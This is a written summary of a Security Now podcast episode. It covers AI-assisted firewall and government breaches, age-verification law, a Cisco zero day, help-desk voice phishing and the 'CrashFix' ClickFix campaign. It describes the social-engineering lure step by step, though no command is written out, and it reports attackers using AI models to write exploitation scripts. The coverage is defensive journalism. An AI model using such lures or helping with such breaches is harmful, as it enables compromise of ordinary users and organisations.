Security Now Episode 1067: KongTuk’s CrashFix - Click, Paste, Pwned (March 3, 2026)

Hosts: Steve Gibson (SG), Leo Laporte (LL)
Podcast: Security Now (TWiT Network)

EPISODE OVERVIEW

In this jam-packed episode, Steve Gibson and Leo Laporte break down a week of high-impact cybersecurity news, focusing especially on the rapidly evolving threat of click-fix exploits targeting Windows users. They also discuss the intersection of AI and cybercrime, new trends in social engineering voice phishing, high-profile vulnerabilities (notably from Cisco), and ongoing struggles between privacy laws and age verification requirements. The episode features sharp insights, technical breakdowns, lively banter, and user stories, all delivered with the show’s signature style.

KEY SEGMENTS & DISCUSSION POINTS

1. [00:00] - Episode Setting & Preview

• Context: Episode recorded early due to upcoming Zero Trust World conference.
• Steve’s Note: “If anything happens on Monday, it won’t be in the show till next week.”
• Main Topics Previewed: ClickFix exploits, AI social engineering, Lapsis Hunters recruiting women, major Cisco zero day, child safety legislation, age verification messes.

2. [12:50] - Picture of the Week

• Description: An “old school” solution to kids blasting the stereo: Dad installs a physical screw into the volume knob to prevent it from turning up past a certain point.
• Memorable Steve Quote:
  “Regardless of the backstory, this is someone’s determined effort to prevent the volume control from being turned up very far.” [13:51]
• Listener feedback: Some suggest a ‘security screw’ for extra effectiveness.
• Verification of Last Week’s Viral Intersection Signage: It was genuine, from Simcoe, Norfolk County, Canada. The story became a local embarrassment after a photo went viral.

3. [18:17] - AI-Driven Hacking Campaigns

Fortinet Incident:

• Key Facts:
  • Over 600 Fortinet firewalls breached.
  • Attackers used commercial AI toolkits (Claude & DeepSeq) to generate scripts for reconnaissance and exploitation.
  • No zero-days: Instead, exploited devices with public management interface, weak passwords, no MFA.
• Steve’s Point:
  “There’s no reason to expect AI to be able to discriminate between the two. ... AI should not receive any of the blame for the way its creators, we humans, choose to use it.” [24:04]
• Leo’s Take:
  “As usual, it’s the humans who are the problem.” [24:40]

Mexican Government Data Breach

• Attacker used AI (Claude) to automate breaches of tax authority and electoral institute, impacting millions.
• Steve’s Advice:
  “Should we care at all that AI was employed in these attacks? No.” [25:47]
• Clickbait Warning: News outlets overhyped the “AI” factor for clicks; in reality, it’s just a new (powerful) tool in both good and bad hands.

4. [27:11] - Tech Industry & Privacy Law Collision

Apple’s Response to Age Restriction Laws:

• Global Patchwork: Apple scrambles to comply with rapidly fragmenting age verification requirements across Brazil, Australia, Singapore, Utah, and Louisiana.
• API Updates: Apple is rolling out a “Declared Age Range API” to assist app developers, but warns that regulatory language is vague and implementation highly fragmented.
• Steve’s View:
  “You’re going to need a whole new building at Apple in order to figure out what to do for who on what day … what a mess.” [32:09]

COPPA Exceptions for Age Verification (FTC):

• Summary: The US FTC confirmed it will not take enforcement action under COPPA if personal information is collected solely for age verification, as long as strict conditions are met.
• Steve’s Commentary:
  “One piece of legislation colliding with another. Surprise.” [37:17]

Meta’s AI & CSAM Detection Floods Law Enforcement:

• Problem: Meta’s AI generates millions of “tips” for suspected child abuse material, most of which are unviable or missing crucial evidence for police.
• Law Enforcement Complains:
  “We’re drowning in tips... we want to get out there and do this work. We don’t have the personnel to sustain that.” [59:03]
• Steve’s Insight:
  “It’s less Meta being evil ... than the growing pains of effective AI deployment.” [59:57]
• Regulatory Pressure: The move is, in part, to avoid breaching new US reporting laws, resulting in much more noise than signal.

5. [60:00] - VPN & Information Control in Russia

• Russia's Internet Watchdog (Roskomnadzor) blocks 469 individual VPN services.
• Telegram to be fully blocked by April (currently only “55% blocked”).
• Steve’s Point:
  “This is a citizenry that is desperate for contact with the outside world and a repressive government doing everything it can to prevent that.” [61:17]

6. [62:28] - UK’s Public Sector Vulnerability Scanning

• New service scans 6,000 public bodies for vulnerabilities, claims 84% faster fixes.
• Press Release Lingo Critiqued: Steve calls out “nonsense” about ‘weak DNS records,’ questions the technical validity of some government statements.
• Core Takeaway: Centralized, continuous scanning and notification is a good idea—even if the implementation and communication are a work in progress.

7. [82:17] - Notorious Old/New Attacks & Social Engineering

Vastamo Psychotherapy Hack Update (Finland):

• Background: 2020 hack & extortion of therapy patients; attacker’s sentence recently extended.
• Steve’s Reminder: Clinics should not keep old sensitive data “in hot storage online ... all of which this hacker sucked up.” [84:53]

Scattered Lapsis Hunters—Actively Recruiting Women for Voice Phishing

• **Group offers $500–$1,000 upfront per call and scripts for “voice phishing” (vishing) campaigns, particularly targeting corporate IT help desks.
• Steve’s Security Tips:
  • Brief IT help desk staff on female social engineering attempts
  • Enforce strong, out-of-band identity verification
  • Move to hardware MFA (FIDO2), monitor logs post-interaction
• Leo’s Anecdote:
  Social engineering using frantic callers, baby sounds, and emotional manipulation:
  “They played a baby crying in the background ... it was a whole scenario.” [89:42]

8. [90:17] - Security News: Cisco & Vulnerability Trends

Cisco SD-WAN Major Zero Day (CVE-2026-20127)

• Authentication bypass—CVSS 10.0—‘breathtakingly rare.’
  “This one is so bad that both the US NSA and CISA … [and] Australia, Canada, New Zealand, UK all published patch-or-perish announcements.” [91:55]
• Steve’s Security Principle:
  “You cannot rely upon authentication.... you have a bunch of offices scattered around … Why not put a rule in the firewall … only accept incoming traffic from that IP to your SD-WAN?” [96:43]

Volchek 2025 Vulnerability Report Teaser

• Key Insight: Only 1% of disclosed vulnerabilities are actively exploited, but those exploited cause outsized damage.
• AI Impact:
  “AI proof-of-concept code is polluting risk assessment pipelines.... AI slop is a term which has taken hold.” [98:44]

9. [104:58] - Listener Feedback: Code Signing Monopoly & Hardware Solutions

• Q: Why not just self-sign software?

• Steve’s Deep Dive:

  • Self-signing works only for your own/local use—won’t be trusted by Windows and users unless they manually trust your cert (which is impractical and unsafe for general distribution).
  • Industry Consolidation: Most code-signing CAs are “just resellers for DigiCert.”
  • Hardware Revolution: Found open source, multi-platform, $72 “smartcard-hsm.com” USB devices that allow secure, flexible code signing across multiple machines.
  • Enterprise Use Case: Internal orgs may use self-signed certs with their own trusted root, but this isn’t practical for public distribution.
  • Memorable Quote: “I don’t see any way to break our certificate authorities’ stranglehold on developers for code signing that needs to be universally trusted.” [113:21]

• Local AI Assistants for Security: Listener suggests using small local language models (like Charlemagne) to monitor users’ actions, warn against risky behaviors.

• Steve:
  “I love the idea ... of some form of active client side local AI agent that ... interposes itself between the user’s actions and the computer system.” [124:31]

FEATURED SEGMENT

[133:56] - MAIN TOPIC: KongTuk’s CrashFix (Click, Paste, Pwned)

The Latest Evolution of Click-Fix Exploits

• Attack Vector: Malicious browser extension (“Next Shield”), disguised as uBlock Origin Lite, offered via an ad in Chrome Web Store.
• How It Works:
  1. Victim seeks ad blocker, installs “Next Shield.”
  2. After normal browsing, a fake but convincing “Microsoft Edge has stopped abnormally” pop-up appears.
  3. Victim clicks “Run Scan,” then is instructed to:
     • Win+R (open Run dialog)
     • Ctrl+V (paste clipboard)
     • Enter
  4. Clipboard had already been primed with a PowerShell command, which is run with full permissions.
  • For Enterprise Devices: Different infection chain, aimed at domain-joined systems (targeting Active Directory, lateral movement).
  • Home Users: Infection chain under active development.
• Steve’s Analysis:
  • “The malware community at large has stumbled upon a fundamental security weakness of Microsoft Windows, which is its users’ comparatively script-following level of understanding of Windows when set against Windows’ increasing power and sophistication.” [142:32]
  • “There’s only one possible ending to this trouble.... The system’s clipboard needs to be handled. Contents that were sourced by any web browser need to be quarantined.” [144:46]
• Recommendation: Microsoft must act at the OS level, as only an integrated Windows update can sufficiently protect average users from this class of highly effective, cross-browser exploits.

NOTABLE QUOTES & MEMORABLE MOMENTS

• Steve, on AI and responsibility:
  “AI should not receive any of the blame for the way its creators, we humans, choose to use it. It’s a tool and nothing more.” [24:08]

• Leo (re: privacy law):
  “This is what Meta wanted, by the way — they didn’t want to do it, so they said, make Apple do this.” [32:40]

• Steve, on help desk social engineering:
  “If it’s a girl on the phone, doesn’t mean it’s not your typical hacker attacker guy. Don’t be fooled by that.” [87:38]

• Steve, on code signing market:
  “The world no longer has a competitive certificate authority industry. We are watching the formation of a monopoly that has the gall to charge its customers per signature.” [112:38]

• Leo (on modern OS complexity):
  “Basically you’re running a machine you don’t understand the operation of at all. And really today, who among us does?” [147:34]

TIMESTAMPS FOR IMPORTANT SEGMENTS

| Timestamp | Segment/Topic | |--------------|------------------------------------------------------------| | 00:00–03:30 | Episode preview & context, upcoming Zero Trust World | | 12:50–15:50 | Picture of the Week: Volume knob hardware hack | | 18:11–26:00 | AI in hacking: Fortinet, Mexican government, & analysis | | 27:11–36:00 | Apple & Meta: Laws, COPPA, reporting, AI slop | | 60:00 | VPNs & Internet controls in Russia | | 62:28–70:09 | UK public sector vulnerability scanning—press release talk | | 82:17–90:17 | Vastamo psychotherapy hack update; Lapsis female vishing | | 90:17–98:44 | Cisco SD-WAN zero day; Volchek 2025 vulnerability report | | 104:58–124:31| Listener feedback: code signing monopoly, smart HSMs, local AI security agents | | 133:56–146:41| Main feature: KongTuk’s CrashFix/new ClickFix exploit |

ACTIONABLE SECURITY TAKEAWAYS

• ClickFix & Clipboard Exploits: Warn users never to follow instructions to paste and run unknown clipboard content—especially from browser popups.
• Attack sophistication: Attackers use convincing fake security popups, cloned extensions, PowerShell; targeting both home and enterprise users.
• Defensive Mechanisms:
  • IT: Educate and rehearse help desk staff on social engineering red flags.
  • Implementation: Move off SMS/push-based MFA. Prefer hardware tokens (FIDO2).
  • Logging: Monitor for anomalous access post-help desk calls.
• Call for Vendor Responsibility: Microsoft must address clipboard-as-exploit risk natively in Windows.
• AI Security Tools: Consider deploying local, small language model agents to protect end users against phishing and social engineering.
• Critical Patch Management: Watch for urgent patches, especially for widely-exploited, authentication-bypass vulnerabilities like Cisco’s SD-WAN.
• Code Signing:
  • Developers: Use CAs with hardware modules, but beware of market consolidation.
  • Enterprises: Internal self-signed certs may be viable within strictly controlled environments.

End of Summary – For full details, technical links, and visuals: Read Steve’s show notes at grc.com.